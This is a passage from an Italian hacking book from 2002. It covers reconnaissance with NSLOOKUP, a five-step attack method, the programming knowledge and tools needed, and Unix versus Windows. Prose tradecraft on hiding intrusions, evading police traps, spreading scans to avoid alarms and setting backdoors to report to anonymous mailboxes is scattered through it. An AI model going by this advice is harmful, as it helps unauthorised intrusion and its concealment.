VisualRoute il quale, come abbiamo visto nel capitolo relativo al protocollo ICMP, si basa su 
questo. 

Nel capitolo di ICMP abbiamo scritto un programma che esegue appunto questa funzione. 
Un'altra funzione che dobbiamo sicuramente svolgere all'inizio è quella di ottenere tutte le 
informazioni relative al dominio dove si trova l'host preso di mira. 

Qusta funzione possiamo tranquillamente eseguirla tramite l'utility fornita con il sistema 
operativo NSLOOKUP. 

Come abbiamo visto prima il programma deve essere settato su un determinato server il 
quale sarà quello che ci fornirà le risposte che ci interessano. 

Per prima cosa dobbiamo scoprire il dominio che normalmente è la parte più a destra oltre il 
nome dell'host. 

Fate attenzione che non è detto che un determinato host debba necessariamente risiedere 
sullo stesso sistema su cui gira il nameserver primario relativo al dominio. 
Generalmente il dominio è dello stesso proprietario del host anche se di fatto questa non è 
una regola in quanto molte società si registrano al loro nome determinati domini e 
successivamente vendono o comunque cedono ad altri i vari host possibili all'interno del 
dominio stesso. 

Un altra cosa da tenere in considerazione è legata al fatto che l'IP restituito da un 
interrogazione fatta con NSLOOKUP non è necessariamente privato di un determinato 
HOST. 

I nouvi software che gestiscono i vari WEB Servers, mail servers ecc. usano delle tecniche 
legate alle estensioni dei nuovi protocolli per gestire con un unico IP diversi domini. 
Ad esempio nel caso dei WEB Servers il protocollo http alla versione 1.1 permette di gestire 
degli hosts virtuali e quindi di avere su di un unico IP diversi WEB. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Anche se un determinato IP preso di mira potrebbe essere corrispondente ad un singolo 
HOST è buona norma ricavare tutte le informazioni sul dominio in cui l'host è inserito. 
Partendo da questo è facile ricavare tutte le informazioni legate ai vari IP che potrebbero 
essere utilizzati o meglio ancora quello del router che gestisce questo. 
In questi ultimi tempi le capacità degli hacker stanno crescendo tanto da arrivare a 
manomettere i vari protocolli come ad esempio IP. 

Quando si giunge a trattare quest'ultimo significa che si è abbassato il livello d'intervento a 
quello dei routers i quali possiedono caratteristiche tali da costituire un ottimo punto di 
partenza per arrivare ad accedere ai vari hosts ospitati sui servers. 

Parlavamo prima di utilizzare alcuni programmi di analisi al fine di identificare i problemi 
presenti su alcuni servers. 

Nella classificazione iniziale relativa alle tipologie degli hackers abbiamo riportato un tipo che 
teoricamente è in grado di identificare i bugs dei sistemi operativi e dei software di gestione 
dei vari servers i quali vengono utilizzati per svolgere diversi tipi di servizi, se così li possiamo 
definire. 

Le due classi fondamentali delle operazioni perpetuate dagli hackers tendono generalmente a 
due tipi di obbiettivi diversi. 

Il primo tipo è relativo a quegli attacchi orientati al blocco della macchina i quali vengono 
eseguiti con mezzi capaci di utilizzare grosse quantità di risorse e quindi, anche se magari 
l'obbiettivo non giunge proprio al blocco totale, in ogni caso fa scendere a dismisura le 
prestazioni operative del sistema. 

Il secondo tipo di operazioni invece tendono a impossessarsi delle macchine e questo 
mediante sistemi di falsificazione delle identità o mediante la specifica di password adatte a 
ottenere determinate permissions. 

Una ulteriore suddivisione che deve essere fatta nei confronti degli hackers posiziona questi 
in base a dove l'azione viene eseguita ovvero se da fuori della rete oppure dall'interno. 
In grosse reti aziendali, in particolar modo quando ci sono intranet collegate tramite reti WAN, 
la problematica degli accessi indesiderati è relativo sia agli utenti interni all'azienda stessa 
che a quelli esterni. 

Il discorso delle passwords per l'accesso a determinate risorse diventa un grosso problema 
quando si trattano reti aziendali di grandi dimensioni in quanto la complessità dei sistemi 
hardware è notevole e quindi più un sistema è complesso più diventa facile che in questo 
possa esserci una svista nei vari settaggi. 

Inoltre la probabilità che una certa password circoli diventa più semplice. 

Una cosa da tenere sempre in considerazione è relativa alle password di default dei vari 

sistemi hardware e software. 

Molte risorse vengono installate sulla rete e le password di default con le quali le case 
costruttrici forniscono le periferiche non vengono cambiate. 



I passi dell'hacker 

II termine che forse descrive meglio l'hacker è quello del super coder. 

Allo stesso delle altre professioni l'hacker possiede un suo metodo che applica prima di 
eseguire quello che di fatto è l'attacco vero e proprio. 
In ogni caso le fasi sono generalmente sempre cinque. 

Dopo aver selezionato la vittima l'hacker dovrebbe creare la mappa di quello che sarà di fatto 
l'attacco. 

Questa mappa aiuterà l'hacker a capire come la sua vittima, la rete , i sistemi e le applicazioni 
interagiscono tra loro. 

Dopo aver creata questa mappa l'hacker dovrà anche creare un piano d'esecuzione il quale 
aiuterà a scoprire le vulnerabilità del sistema della vittima garantendo una maggiore 
probabilità di successo. 

E' a questo punto che l'hacker dovrà confrontare i dati posseduti con quelli presenti nei 
database dei bugs e dei difetti dei vari componenti del sistema della vittima. 
Dopo che l'hacker ha completato i suoi studi e le ricerche dovrà a questo punto stabilire quale 
potrebbe essere l'entry point ideale per iniziare l'attacco. 

Questa è forse la decisione più importante in quanto dalla scelta di questa potrebbe 
dipendere il successo del tutto. 
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Considerate il fatto che dall'altra parte potrebbero esserci sia persone che strumenti adatti 
all'individuazione delle operazione eseguite dall'hacker e n questo caso il rischio potrebbe 
anche non essere soltanto l'insuccesso dell'attacco. 

La pianificazione delle operazione deve prevedere anche quelle operazioni che dovranno 
servire ad eseguire la copertura della azioni fatte. 

Determinate operazioni potrebbero durare giorni se non settimane per cui lasciare i segni di 
quello che viene fatto potrebbe portare a cadere dentro a trappole spesso fatte anche da 
agenti di polizia. 

Tutti i dati raccolti devono essere attentamente vagliati per vedere se ci sono anomalie di 
qualsiasi tipo che potrebbero fare pensare a operazioni volontarie fatte da qualche d'uno. 
Se non siete più che sicuri lasciate perdere anche perché il rischio è grosso. 
In genere conviene prolungare le operazioni di raccolta delle informazioni al fine di riuscire ad 
aumentare la sicurezza di quello che sarà il momento dell'attacco vero e proprio al fine di 
rendere il suo tempo il più corto possibile. 

Spesso gli hacker creano anche accessi finalizzati solo a confondere le idee. 
Supponete di accedere ad un determinato sistema e quindi di avere il controllo di questo. 
Per prima cosa potreste settare un qualche accesso FTP o simile in modo tale che se per 
caso vi trovaste a pensare di essere in pericolo potreste sempre pubblicizzare tale accesso 
su qualche sito WAREZ in modo da creare una confusione tale sul sistema da passare 
inosservati. 

Nel caso in cui decideste di usare qualche sistema a backdoor potreste programmarlo in 
modo tale che una volta attivato il socket di accesso questa invierebbe un email a qualche 
casella anonima che voi avrete l'accortezza di controllare passando da qualche 
anonimizzatore. 

Ritornando ai cinque passi fondamentali dell'hacker li possiamo riassumere mediante le 
seguenti voci: 

• Creazione di una mappa di attacco. 

Mediante l'utilizzo di Utilities pubbliche o mediante altre scritte personalmente possiamo 

raccogliere tutte le informazioni legate ad un determinato sistema vittima. 

Tra queste informazioni ci sono quelle generali legate al dominio e agli host collegati a 

questo. 

Un utility tra quelle necessarie a questo punto c'è ad esempio NSLOOKUP. 

• Creazione di un piano d'esecuzione 

L'hacker quando crea il piano d'esecuzione ha tre punti in mente e precisamente : i servizi 
vulnerabili, il sistema operativo dell'obbiettivo e gli exploits locali o remoti necessari per 
portare a termine un intrusione positiva. 

• Definizione del punto d'inizio 

L'ultima vulnerabilità è spesso la meno protetta. 

L'hacker conosce questo e quindi esegue il primo tentativo basandosi su questo principio. 
Viene anche eseguito uno scanning del sistema per determinare quali hosts sono ondine e 
quali vulnerabilità questi possiedono. 

• Accesso continuato e nascosto 

Dopo aver stabilito un metodo d'attacco l'hacker eseguirà il test delle potenziali vulnerabilità 
eseguendole su un range di IP sempre differenti in modo da non allarmare. 

• L'attacco 

L'intrusione per se stessa è una fase relativamente rapida. 

L'hacker guadagna l'accesso tramite un servizio vulnerabilità ma deve ricordarsi che il cuore 
di tutto è l'attività legata alla copertura di quello che ha fatto. 

L'hackeraggio è per se stessa un attività legata a moltissimi fattori quasi tutti tecnici anche se 
poi alla fine di fatto potrebbe essere una fattore importantissimo quella che potremmo definire 
con il termine di "ingegneria sociale". 

Ci sono delle volte che lo studio delle caratteristiche psicologiche e sociologiche degli 
individui potrebbe condurre a guadagnare le password di accesso sistemi remoti. 
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In questo volume vedrete che verranno trattati un numero abbastanza grande di 
argomentazioni anche se di fatto queste non costituiscono l'insieme di quelle che devono 
essere usate in ogni attacco. 

Ogni sistema possiede le sue caratteristiche e anche due sistemi con le stesse caratteristiche 
hardware e software probabilmente avranno differenze fondamentali dovute ai metodi 
differenti di settaggio legate alle filosofie di diversi amministratori di sistema. 
Abbiamo già detto diverse volte che per tante conoscenze uno abbia non esiste una 
bacchetta magica che permetta di entrare in tutti i sistemi. 

Il fatto di conoscere diverse metodologie permette solo di ampliare le possibilità ma in ogni 
caso seremo sempre lungi da avere una sicurezza al 100%. 



Le conoscenze 

Una domanda che sarà sorta spontanea alla vista di questo libro è sicuramente stata 
attinente a quelli che sarebbero stati gli argomenti trattati al suo interno. 
Il progetto è ambito in quanto normalmente i libri che trattano questi argomenti riportano 
esclusivamente determinati concetti partendo dal presupposto che le persone possiedano 
già altri tipi di nozionismi. 

Questo è di fatto una lacuna che però è quasi sempre necessaria al fine di non fare 
diventare eccessivamente vasta l'argomentazione trattata. 

Il problema però, come dicevamo prima, è che i concetti ce l'hacker deve conoscere sono 
molto vasti e vanno da quelli relativi all'hardware dei vari sistemi, ai sistemi operativi, ai 
linguaggi di programmazione, alla teoria delle reti e dei protocolli per giungere a quegli strati 
che supportandosi sui vari OS offrono funzioni da servers come ad esempio i WEB Server, i 
MAIL Server ecc. 

Già per se stessi ciascuno di questi possiedono una vastità elevatissima e quindi 
l'ambizione di questo progetto sta nel fatto di riuscire a riportare in un volume con un 
numero di pagine accettabile le informazioni giuste riportate in modo corretto ed in particolar 
modo con esempi che rendano queste funzionali e utilizzabili. 

Scrivere pagine e pagine di informazioni è semplice in quanto basterebbe riportare i vari 
testi che descrivono gli standard per riuscire a riempire migliaia di pagine. 
La difficoltà sta invece nel mettere tutto l'essenziale in una forma concatenata stando attenti 
a non mettere l'inutile e di inserire invece il necessario. 

Chiaramente sugli argomenti riportati non potremo fare un trattato anche se in alcuni punti 
tratteremo informazioni che forse vi sembreranno superflue ma che di fatto la conoscenza di 
queste è necessaria per qualche metodologia riportata. 

Dovremo necessariamente vedere anche alcune informazioni legate alla programmazione in 
un linguaggio e precisamente sul linguaggio C. 

Il linguaggio C risulta essere una scelta obbligata in quanto la manipolazione a basso livello 
delle informazioni presenti nei pacchetti di dati è quasi esclusivamente dominio di quelli 
definiti come di baso livello. 

L'assembler sarebbe sicuramente il più idoneo sia per questioni di compattezza che di 
velocità ma allo stesso tempo risulta essere anche il più complesso da apprendere a causa 
della minuziosità dei vari passaggi negli sviluppi algoritmici per cui il linguaggio C pur 
possedendo alcune cose simili all'assembler semplifica notevolmente la vita in quanto molto 
più simile al nostro linguaggio naturale. 

Il linguaggio C potrebbe essere definito come un super assembler in quanto per alcuni 
versi, in particolar modo per quanto riguarda la gestione delle memoria, possiede grosse 
similitudini con questo. 

Tra gli argomenti di questo volume in ogni caso riporteremo anche degli accenni 
all'assembler dato ce alcune cose devono necessariamente possedere queste basi per 
essere comprese ed eseguite. 

Mi riferisco ad esempio a certi tipi di attacchi legati ai buffers overflow i quali sia per la loro 
natura legata alla gestione della memoria che per quanto riguarda le modifiche da fare per 
l'esecuzione dell' exploit stesso, risultano necessarie conoscenze legate all'assembler. 
Come avevamo accennato precedentemente i linguaggi utilizzano funzioni offerte dai 
sistemi operativi su cui si basano. 

Questo significa che anche alcuni concetti legati a questi dovranno essere presi in 
considerazione anche perché alla fine del tutto conoscere come sono strutturati gli OS 
risulta essere culturalmente, in senso informatico, importante. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



La definizione precedente che affermava il fatto che i linguaggi utilizzassero funzioni offerte 
dal sistema operativo ci porta a intuire che certi tipi di funzionalità potrebbero essere proprie 
dell'OS su cui si esegue un certo sviluppo. 

Questo è sicuramente vero ma di fatto esistono in quasi tutti i casi dei porting delle varie 
librerie sotto tutti i sistemi operativi. 

Nel 1987 dopo aver iniziato l'esperienza con la rete FidoNet iniziai anche quella con un rete 
interamente gestita dalle funzioni presenti in ambiente Unix e precisamente offerte da 
UUCP. 

Questa tendenza del sistema operativo Unix a gestire già con funzioni presenti nella sua 
dotazione di base tutti quei sevizi di rete, ha portato questo a essere considerato in modo 
privilegiato per tutte quelle funzioni che tendono ad eseguire reti basate su certi protocolli. 
Linux di fatto possiede al suo interno tutte le funzioni necessarie alla gestione di reti sia dal 
punto di vista di quello che è il meccanismo di trasferimento delle informazioni che da quello 
che è invece il sistema adatto ala creazione di sistemi legati alla sicurezza di rete come ad 
esempio nel caso dei firewall. 

Alcune librerie presenti sotto questo sistema operativo permettono di gestire tutte quelle 
funzionalità che sono essenziali per i compiti che si prefigge di raggiungere un hacker. 
Parlo ad esempio della libreria TCPDUMP la quale dispone di funzioni molto consistenti per 
quello che riguarda la gestione dei pacchetti legati al protocollo TCP/IP. 
In ogni caso queste librerie sono state portate anche sotto sistema Windows per cui la 
scelta ce faremmo durante la trattazione di questo volume sarà relativa a quelle librerie che 
è possibile trovare in ambedue gli ambienti. 

Sotto Windows è necessario considerare l'ambiente Microsoft in quanto Windows non risulta 
più essere un semplice OS ma un collante che tiene insieme decine e decine di altri sistemi i 
quali dispongono di SDK specifici creati per la scrittura di software che attenendosi a tali 
funzioni permettono la creazione di certi software. 

Microsoft ogni qualche mese distribuisce un CD con tutti gli SDK legati a Windows e ai vari 
strati di questo. 

Omettere completamente l'ambiente Borland non sarebbe corretto in quanto quest'ambiente 
di sviluppo grazie all'utilizzo di quelli definiti con il termine di VCL offre una semplicità e una 
velocità nello sviluppo di certe applicazioni che Microsoft non possiede. 
La filosofia adottata dalla Borland per i suoi sistemi di sviluppo semplifica moltissimo la 
creazione e la gestione di programmi in quanto molte funzionalità che negli altri linguaggi 
venivano usate scrivendo delle righe di programma in questo sistema di sviluppo le stesse 
cose vengono fatte semplicemente posizionando a video sopra ai forms gli oggetti VCL che 
le rappresentano. 

La gestione delle trasmissioni su rete vengono fatte mediante l'utilizzo di quelli chiamati 
Socket. 

Tra i vari componenti che C++Builder dispone nelle sue toolbars ne esistono alcuni legati a 
questo tipo di trasmissioni per cui la creazione di un Socket da utilizzare per un 
collegamento TCP o UDP sarà sufficiente prendere l'icona dalla toolbar che la rappresenta 
e posizionarla sul form attivo in quell'istante. 

Chiaramente la disponibilità negli ultimi mesi del .NET Framework e la sua implementazione 
nei nuovi sistemi operativi come ad esempio WHISTLER e Windows XP fa si che l'uso del 
Visual Studio di Microsoft debba necessariamente essere considerato in primo piano ma 
allo stesso tempo la presenza di certi componenti in C++Builder fa si che non si possa 
ignorare neppure questo. 

In alcuni casi la creazione di un software legato alla trasmissione di pacchetti TCP/UDP 

creato con CPPBuilder è questione di pochi istanti. 

Dicevo prima che Microsoft ogni tanto rilascia un CD con tutti gli SDK. 

Su questo CD esiste una quantità di documentazione impressionate relativa all'infinità di 

sistemi di sviluppo destinati a tutti quegli ambienti che oggi come oggi compongono 

Windows. 

Quando si vede la lista per la prima volta si rimane sconcertati in quanto prima era difficile 
immaginare che all'interno di Windows ci potessero essere cosi tanti componenti destinati a 
qualsiasi funzione a partire dall'acquisizione immagini per arrivare a quelle relative alla 
crittografia. 

Prima di inventare l'acqua calda consiglierei di dargli un occhiata in quanto al suo interno è 
possibile trovare qualsiasi genere di funzione per qualsiasi scopo molte delle quali 
indirizzate alla gestione delle reti. 
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Ovviamente il discorso delle consultazioni di librerie esterne diventa un cosa semplice 
quando si possiedono già certe conoscenze di base legate all'uso dei vari linguaggi. 
Proseguendo questa panoramica legata alle conoscenze necessarie per l'utilizzo di certe 
tecniche, ovvero quelle che tratteremo in questo volume, dobbiamo necessariamente 
includere alcune legate all'hardware dei sistemi e delle reti. 

In questi ultimi tempi l'hackeraggio dei sistemi ha spostato le tecniche verso quelli che sono 
i dispositivi a basso livello come ad esempio nel caso dei router. 

Un certo tipo di visione è anche necessaria per riuscire a concepire alcune funzioni legate al 
basso livello in particolar modo per quanto riguarda la gestione della memoria dei sistemi. 
Chiaramente partendo da questo livello è necessario anche avere alcune conoscenze 
rispetto a quelle che sono le successive stratificazioni su cui si basano i sistemi operativi. 
Lo strato hardware di fatto possiede un primo livello software che permette 
l'interfacciamento del software con questo e precisamente il BIOS con le estensioni che 
permettono le gestioni di rete. 

Fino qualche anno fa le stratificazioni che costituivano un sistema funzionante terminavano 
a questo punto ovvero hardware, bios e su questi il sistemo operativo con i suoi vari 
linguaggi di programmazione che permettevano la scrittura di software. 
L'unione delle macchine alle configurazioni di rete, hardware e software, ha permesso la 
scrittura di ulteriori strati costituiti da sistemi che tendono a gestire automaticamente le 
configurazioni e le funzionalità come nel caso dei sistemi LDAP, ActiveDirectory e di molti 
servers che possono essere installati sui sistemi al fine di gestire determinati protocolli di 
livello più elevato di quelli di base. 

I sistemi operativi di un tempo sfruttando le funzioni del BIOS permettevano l'uso delle 
periferiche hardware grazie a un certo numero di nuove funzioni implementate dentro a 
questi. 

OS come Windows negli anni hanno aggiunto tecnologie particolari come ad esempio il 
sistema OLE da cui sono poi successivamente derivate altre come la tecnologia ActiveX, 
quella COM, la DCOM e cosi via. 

Si tratta di argomenti complessi se visti alla luce della loro progettazione, ma noi 
fortunatamente dovremmo solo utilizzarle come tali mediante le funzioni di importazione 
all'interno dei linguaggi usati per la scrittura dei moduli operativi. 

Lo studio dei servers è sicuramente un punto impossibile da omettere in quanto moltissimi 
exploit vengono eseguiti partendo da questi e non solo da WEB server, mail server ma 
anche quelloi nuovi come ad esempio Biz Talk server, Share Portai server, ISA Server ecc. 

I linguaggi di programmazione visti insieme alle varie librerie di funzioni specifiche per la 
creazione di programmi di rete serviranno alla scrittura di quelli che ho definito con il termine 
di moduli operativi ma che di fatto non sono altro che i programmi software che hanno come 
finalità quella di rendere pratiche tutte le teorie legate alla perpetuazione delle funzioni di 
hacking. 

Questo non significa che dovremo perdere tempo a riscriverci qualsiasi software necessario 
per lo svolgimento di alcune funzioni come lo sniffing in quanto per fare questo potremo 
tranquillamente utilizzare i moltissimi programmi che esistono in circolazione i quali in 
moltissimi casi sono veramente ben fatti. 

Programmi come ad esempio SOLARWIND, COMMVIEW ed altri ancora utilizzano tecniche 
tali che se uno volesse mettersi li a riscriverli perderebbe diversi mesi se non anni, senza 
considerare che farlo sarebbe inutile. 

Questo è per dire che tra le conoscenze che cureremo ci saranno quelle legate all'uso di 
certi programmi. 

II viaggio di questo volume proseguirà verso quello che è di fatto la rete con tutti i suoi strati 
funzionali ciascuno dei quali indirizzato allo svolgimento di alcune funzioni. 

Nella panoramica legata ai vari linguaggi vedremo anche programmi scritti da noi per il 
controllo di questi. 

Molti protocolli come ad esempio ICMP sono essenziali per l'individuazione delle 
caratteristiche di certi hosts. 

Inoltre nell'ambito delle strutture di rete dovremmo anche accennare ai vari meccanismi che 
regolano certi tipi di funzioni in internet come quello legato ai DNS. 

Inutile dire che le conoscenze dei vari meccanismi ha un duplice scopo ovvero quello legato 
allo sfruttamento funzionale di questi e quello dell'individuazione di certi suoi bugs. 
Il viaggio continuerà poi infine con i vari exploits possibili suddivisi per tipologia. 
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A riguardo di questo possiamo dire che in genere questi problemi all'interno dei servers o 

dei sistemi operativi potrebbero esserci per anni senza che nessuno se ne accorga. 

Dal punto di vista dell'amministratore di sistema è importante che questo regolarmente 

segua gli avvisi che compaiono sui vari siti relativi ai costruttori dell'hardware e dei sistemi 

operativi. 

Il punto di vista dell'hacker invece cerca di anticipare l'installazione delle hotfix e delle patch 
da parte dei vari amministratori. 

L'individuazione di questi è possibile farlo grazie ad alcuni programmi che vedremo 
successivamente. 

Rimane comunque scontato il fatto che la prima parte relativa ai concetti di 
programmazione, ai sistemi operativi ed ad altre cose che non sono concettualmente 
attinenti a quella che è la rete vera e propria, il livello non è dei più approfonditi ma 
comunque sufficiente a portare avanti gli altri concetti. 

Il discorso è orientato a portare il lettore a riuscire a scriversi le proprie routine e i propri 
programmi adatti a verificare le teorie che necessariamente deve farsi quando segue a 
livello di analisi un determinato sistema. 

L'utilizzo del linguaggio di programmazione necessita anche della conoscenza di alcune 
librerie di funzioni che in questo caso sono comunque orientate alla gestione dei pacchetti e 
della rete stessa. 

Infatti molte librerie che sono presenti sotto sistemi operativi come ad esempio Linux sono 
state di fatto portate anche in ambienti come Windows. 

In questo volume tratteremo appunto quelle che sono presenti in tutti gli ambienti per dare la 

possibilità di scegliere il sistema operativo di base che uno desidera. 

Alcuni tipi di conoscenze sembreranno a prima vista più destinate ai crackers che agli 

hacker. 

Di fatto questo non è vero in quanto la ricerca di determinati tipi di exploits pretendono 
conoscenze che sono molto simili a quelle del primo tipo in quanto di fatto sono debuggers e 
disassemblatori. 

L'hackers dovrà crearsi un laboratorio in cui saranno presenti determinati sistemi di sviluppo 
e quindi linguaggi e librerie ed in particolar modo dovrà disporre della possibilità di montare 
sulla propria macchina anche i software verso i quali dedicherà le proprie attenzioni. 
In altre parole se ad esempio la sua ricerca fosse orientata verso l'individuazione di exploits 
legati a servers, come lo potrebbe essere MS (Internet Information Server), dovrà essere sua 
cura istallarsi questo software sulla sua macchina per poterlo mettere in analisi e vedere le 
risposte a determinati test. 

Sicuramente il sistema operativo da utilizzare dovrà essere una versione server e quindi o 
Linux oppure una versione di Windows come ad esempio Whistler o Windows 2000 server. 
Alcuni sistemi operativi come Windows 2000 Advanced Server possiedono le caratteristiche 
delle versioni server ma in più dispongono di funzionalità che ben difficilmente sarà possibile 
utilizzare in un ambiente non professionale. 

Questa versione infatti si differenzia dalla versione normale per il fatto che permette la 
gestione dei sistemi in cluster ovvero quelli in cui i servizi vengono gestiti su due macchine 
indipendenti ciascuna delle quali è sempre pronta a prendere il posto dell'altra nel caso in 
cui una di queste andasse in crash. 

Il fatto di avere già un bagaglio culturale è di fatto importante anche se lo scopo di questo 
volume è quello di dare tutto il nozionismo necessario per lo svolgimento di determinate 
attività. 

Linux in questo caso dispone sicuramente di maggiori risorse anche se il loro uso è più 
ostico. 

I sistemi di sviluppo relativi a Windows sono sicuramente più orientati all'utente finale anche 
per la sua facilità d'uso dovuto alla presenza delle finestre in cui spesso il controllo dei 
programmi viene eseguito con il mouse. 

Comunque come dicevamo prima le librerie che verranno descritte sono relative a tutti e due 
gli ambienti per cui avrete la libertà di scegliere quello ce più vi aggrada. 
La scelta delle librerie è stata ardua in quanto ho dovuto cercare in mezzo a centinaia di 
ambienti che sono al giorno d'oggi reperibili sulla rete. 

Vie chiederete come mai vengono trattate più librerie relative alla trasmissione di dati tramite 
TCP/IP. 

In effetti le librerie sembrerebbero simili ma non lo sono in quanto alcune funzionalità sono 
presenti solo in una di queste e non nelle altre. 
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Per fare un esempio ho riportato la libreria socket e anche quella legata a tcpdump o 
windump in ambiente Windows. 

Le funzionalità di capture dei pacchetti è presente solo nella seconda famiglia di librerie e 
non nella prima. 

Socket 2 è efficientissima per tutte quelle funzionalità che possono essere utilizzate a livello 
di applicazione ma dovendo scendere come livello a quello d'interfaccia il pacchetto non è 
più sufficiente. 

La serie di classi create a partire da Winsock 2 possono essere considerate come basi 
standard per quello che riguarda la scrittura di applicazioni che aderiscono a questo 
pacchetto. 

Ripeto che la gestione fatta da CPP Builder è sicuramente la più facile in quanto una 
connessione TCP o UDP corrisponde ad inserire visivamente sul form di lavoro il 
componente relativo alla gestione in questione. 

Anche la parametrizazione viene eseguita tramite settaggio visivo dei parametri. 




CPP Builder semplifica la vita facendo ben poca cosa solo che quel poco corrisponde al 
modo di pensare delle persone. 

Come si suole dire l'uomo ragiona per immagini e di fatto l'allocazione di una classe avviene 
posizionando a video l'oggetto. 

A questo CPP Builder assegna un nome a caso come ad esempio nell'immagine 
precedente la connessione TCP è stata chiamata Socket. 

I parametri possono essere inseriti nel OBJECT INSPECTOR oppure direttamente nei 
campi tramite linee di programmazione. 

Se si vuole inserire l'IP di connessione dentro alla finestra dell'inpsector e sufficiente farlo 
direttamente. 

Se la necessità invece avviene da dentro al programma si potrà accedere a tale parametro 
usando lo stesso nome che viene visualizzato dentro a questa finestra usando il nome per 
riferirsi a quella connessione specifica. 

Per spiegarmi meglio la connessione CPP Builder l'ha chiamata Socket e il parametro dell' 
IP si chiama Hot per cui volendo da programmazione cambiare questo valore sarà 
sufficiente dare : 



Nel volume tratteremo anche il trattamento di base dei socket da parte di linguaggio come 
Java e quindi poi sarà compito vostro selezionare un sistema oppure un altro. 
D'altra parte non esistono complicazioni particolari a livello algoritmico in quanto 
indipendentemente dal sistema scelto i passi da fare per arrivare a creare una connessione 
TCP o UDP sono gli stessi. 

Le funzioni che vengono fatte da CPP Builder di fatto sono esattamente le stesse che 
verrebbero fatte scrivendo degli statement in C++ manualmente ma chiaramente il fatto che 
tutto venga fatto con il mouse sulla spazio di lavoro semplifica la creazione dei modelli 
mentali. 

Quando noi prendiamo un determinato componente e lo inseriamo sul form il sistema alloca 
la nuova classe mediante l'istruzione : 
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nome_classe variabile = new nome_classe(); 



Eseguendo quest'istruzione manualmente dovremmo solo selezionare il nome della 
variabile in modo tale che questo possa essere usato successivamente per accedere ai 
membri della classe stessa. 

Nel caso del sistema di programmazione visuale il sistema di sviluppo attribuisce un nome 
di default lasciandoci comunque la liberta di cambiarle tramite sempre l'OBJECT 
INSPECTOR. 

Chiaramente il fatto di parlare anche di questo sistema di sviluppo potrebbe indurre a 
complicare ancora di più la scelta verso il sistema da utilizzare. 

Nel campo dell'hacking, come abbiamo già detto, la scelta migliore è sicuramente LINUX in 

quanto tutte le librerie e gli strumenti sono già inclusi dentro al sistema operativo stesso. 

In ogni caso vorrei che fosse chiaro che la maggior parte dei programmi che verranno visti 

utilizzano il meccanismo offerto dai socket per comunicare sulla rete. 

Tale utilizzo è quanto di più semplice ci sia in quanto in genere prevede pochissime 

istruzioni tra le quali una adatta settare l'ambiente e qualche altra come ad esempio quella 

che apre il socket ovvero il canale di comunicazione vero e proprio. 

Ritornando al discorso di cosa si dovrà installare per avere un ambiente di lavoro sul quale 
esercitarsi possiamo fare solo un altro tipo di considerazione. 

Come abbiamo detto precedentemente in questo settore Linux è sicuramente l'ambiente 
migliore in quanto questo dispone al suo interno di tutti i sistemi di sviluppo, di tutte le 
librerie, di tutti i servers di cui uno potrebbe aver bisogno. 

Il problema è che abituati a certe utility classiche del sistema operativo di casa Microsoft 
spesso non siamo in grado di distaccarcene completamente per cui moltissime volte questi 
due OS convivono sugli stessi dischi in partizioni differenti. 

L'evoluzione che hanno avuto in questi ultimi anni i dischi fissi ci hanno permesso di non 
considerare più un problema quello dello spazio in quanto su dischi da 20 o più Gbytes 
possono starci tranquillamente tutte le versioni di sistema operativo che vogliamo. 
In ogni caso esistono alcuni pacchetti che permettono di potere gestire dentro ad un finestra 
di un sistema operativo l'altro OS. 

All'interno di una finestra di Linux possiamo tranquillamente far giarare Windows o 
viceversa. 

Il sosftware che gestisce questa potenzialità si chiama VMWARE. 
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VMWARE si attiene al concetto delle macchine virtuali e di fatto permette di gestire delle 
finestre dentro al sistema operativo originale, dentro alle quali possono essere fatti girare 
altri sistemi operativi. 

La simulazione della macchina è globale tanto che quando si preme nella finestra il pulsante 
dell'interrutore d'accensione, il software simula il boot completo con tanto di diagnostica 
della RAM. 

Come abbiamo detto l'utilizzo di VMWARE permette di non dover scegliere la partizione ma 

al contrario è possibile fare girare diversi sistemi operativi contemporaneamente. 

In ogni caso questa è una delle soluzioni per avere sia WINDOWS che LINUX. 

Nell'ambito dei compilatori è possibile avere il Visual Studio per quello che riguarda i 

programmi Windows e il compilatore GCC di Linux per quanto è relativo a Unix. 

In ambiente Windows sono stati fatti dei porting di alcuni sistemi di sviluppo Linux come ad 

esempio CYGWIN il quale è in grado di compilare moltissimi programmi destinati 

all'ambiente Linux. 

L'hacker può scegliere un solo sistema operativo anche se di fatto sarebbe cosa buona 
disporre di tutti e due gli ambienti. 



I sistemi operativi 

Potremmo dire che esistono diversi sistemi operativi a cui è possibile accedere tramite rete 

anche se di fatto gli unici che considereremo sono di fatto Unix e Windows. 

Si tratta di due sistemi operativi completamente differenti come ottica e anche come scopi 

d'utilizzo. 

II primo è un sistema operativo nato originariamente su macchine di classe maggire rispetto 
al PC nato già originariamente per le gestioni multiusers e multitasking. 

Windows invece nasce come evoluzione grafica di MsDos è di fatto è sempre stato un 
sistema operativo monoutente che negli ultimi anni si è indirizzato alle gestioni di rete. 
Strutturalmente siamo di fronte a due idee completamente opposte a riguardo della 
metodologia di progettazione e sviluppo. 

Lo Unix è costituito da un cuore chiamato Kernel il cui scopo è quello di interfacciare il mondo 
esterno con le periferiche hardware mediante una serie di device driver e contornato da un 
grossissimo numero di programmi che sfruttando le funzionalità di questo offrono tutte le 
funzionalità del sistema operativo. 

Qualsiasi funzione è implementata come programma esterno anche ad esempio la procedura 
di login che permette ad un utente di accedere al sistema. 

Windows dispone di uno strato di background compressissimo basato su una serie di 
tecnologie particolari come ad esempio quella OLE sulla quale si basano altre come quelle 
ActiveX, Dcom ecc. 

La differenza fondamentale è che Windows dovrebbe essere inteso come un OS indirizzato 
all'interfaccia grafica sulla quale si è basato il suo successo mentre il secondo è sicuramente 
da considerare come sistema da utilizzare come server di rete o comunque per tutte quelle 
applicazioni non direttamente indirizzate all'uso d'office automation. 

Anni un docente dell'università di Amsterdam, Tannenbaum, scrisse un volume indirizzato a 
spiegare la strutturazione dei sistemi operativi dentro ai quali veniva utilizzato un sistema 
Unix oriented, Minix, come modello di base. 

Da questo esempio nacque Linux il cui successo si è sviluppato rapidamente negli anni come 
sistema operativo antagonista di Windows. 

Windows proprio per la sua natura grafica ha sempre preteso un grosso numero di risorse per 
cui in un periodo in cui queste avevano dei costi particolarmente alti la tendenza a risparmiare 
ha fatto si che spesso questo fosse causa di instabilità dei nostri sistemi domestici, 
guadagnandosi una fama forse in gran parte immeritata. 

Oltre a questo spesso ci si è completamente dimenticati che i prodotti devono generalmente 
